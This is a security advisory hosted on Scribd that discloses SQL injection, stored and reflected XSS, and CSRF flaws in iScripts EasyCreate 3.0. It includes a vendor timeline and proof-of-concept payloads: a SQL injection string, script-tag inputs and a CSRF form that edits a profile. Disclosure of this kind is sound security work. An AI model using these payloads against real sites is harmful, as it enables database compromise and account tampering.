Scribd Logo
Upload

Welcome to Scribd!

  • 39386

    Uploaded by

    Kakak Gebok Elf
    19 views3 pages
    wwe

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    wwe

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    19 views3 pages

    39386

    Uploaded by

    Kakak Gebok Elf
    wwe

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 3

    iScripts EasyCreate 3.

    0 Multiple Vulnerabilities

    [Vendor Product Description]


    - iScripts EasyCreate is a private label online website builder. This software a
    llows you to start an
    online business by offering website building services to your customers. Equippe
    d with drag and drop
    design functionality, crisp templates and social sharing capabilities, this onli
    ne website builder
    software will allow you to provide the best website building features to your us
    ers.

    - Site: http://www.iscripts.com

    [Advisory Timeline]
    [17.11.2015] First contact to vendor.
    [08.12.2015] Follow up with vendor. No response received.
    [08.12.2015] Ticket Created using online portal (id #010248399110346).
    [08.12.2015] Ticket closed by vendor without requesting vulnerability details.
    [28.12.2015] Vendor responds asking more details.
    [29.12.2015] Sent details to the vendor.
    [05.01.2016] Follow up with vendor. No response received.
    [14.01.2016] Follow up with vendor. No response received.
    [28.01.2016] Public Security advisory released.

    [Bug Summary]
    - SQL Injection
    - Cross Site Scripting (Stored)
    - Cross Site Scripting (Reflected)
    - Cross Site Request Forgery

    [Impact]
    - High

    [Affected Version]
    - EasyCreate 3.0

    [Advisory]
    - ZSL-2016-5298
    - http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5298.php

    [Bug Description and Proof of Concept]


    1. Cross-Site Request Forgery (CSRF) - The application allows users to perform c
    ertain actions via HTTP requests
    without performing any validity checks to verify the requests. This can be explo
    ited to perform certain actions
    with administrative privileges if a logged-in user visits a malicious web site
    https://en.wikipedia.org/wiki/Cross-site_request_forgery
    2. Cross Site Scripting (XSS) - Multiple cross-site scripting vulnerabilities we
    re also discovered. The issue is
    triggered when input passed via multiple parameters is not properly sanitized be
    fore being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in a user's brow
    ser session in context of an affected site.
    https://en.wikipedia.org/wiki/Cross-site_scripting
    3. SQL Injection - iScripts EasyCreate suffers from a SQL Injection vulnerabilit
    y. Input passed via a GET
    parameter is not properly sanitised before being returned to the user or used in
    SQL queries. This can be exploited
    to manipulate SQL queries by injecting arbitrary SQL code.
    https://en.wikipedia.org/wiki/SQL_injection

    [Proof-of-Concept]
    1. SQL Injection
    Parameter:
    siteid (GET)
    Payload:
    action=editsite&siteid=6 AND (SELECT 3405 FROM(SELECT COUNT(*),CONCAT(0x71716b6a
    71,(SELECT (ELT(3405=3405,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_
    SCHEMA.CHARACTER_SETS GROUP BY x)a)
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    +++++++++++++++++++++++
    2. Multiple Stored Cross Site Scripting
    Parameter:
    siteName (POST)
    Payload:
    Content-Disposition: form-data; name="siteName"
    <script>alert(1)</script>
    Parameter:
    selectedimage (POST)
    Payload:
    selectedimage=<script>alert(1)</script>
    Parameter:
    filename (POST)
    Payload:
    filename=<script>alert(1)</script>
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    +++++++++++++++++++++++
    3. Multiple Reflected Cross Site Scripting
    Parameter
    catid (GET)
    Parameters
    selectedimage, description, keywords, robotans, refreshans, authorans, copyright
    ans, revisitans, cmbSearchType (POST)
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    +++++++++++++++++++++++
    4. Multiple Cross Site Request Forgery (CSRF)
    Sample Payload for editing profile:
    <html>
    <body>
    <form action="http://localhost/easycreate/demo/editprofile.php?act=post" met
    hod="POST">
    <input type="hidden" name="vuser&#95;login" value="user" />
    <input type="hidden" name="vuser&#95;name" value="Demo&#32;User" />
    <input type="hidden" name="vuser&#95;lastname" value="PWNED" />
    <input type="hidden" name="vuser&#95;email" value="demo&#64;demo&#46;com"
    />
    <input type="hidden" name="vuser&#95;address1" value="a" />
    <input type="hidden" name="vcity" value="" />
    <input type="hidden" name="vstate" value="" />
    <input type="hidden" name="vcountry" value="United&#32;States" />
    <input type="hidden" name="vzip" value="" />
    <input type="hidden" name="vuser&#95;phone" value="" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    +++++++++++++++++++++++
    All flaws described here were discovered and researched by:
    Bikramaditya Guha aka "PhoenixX"

    You might also like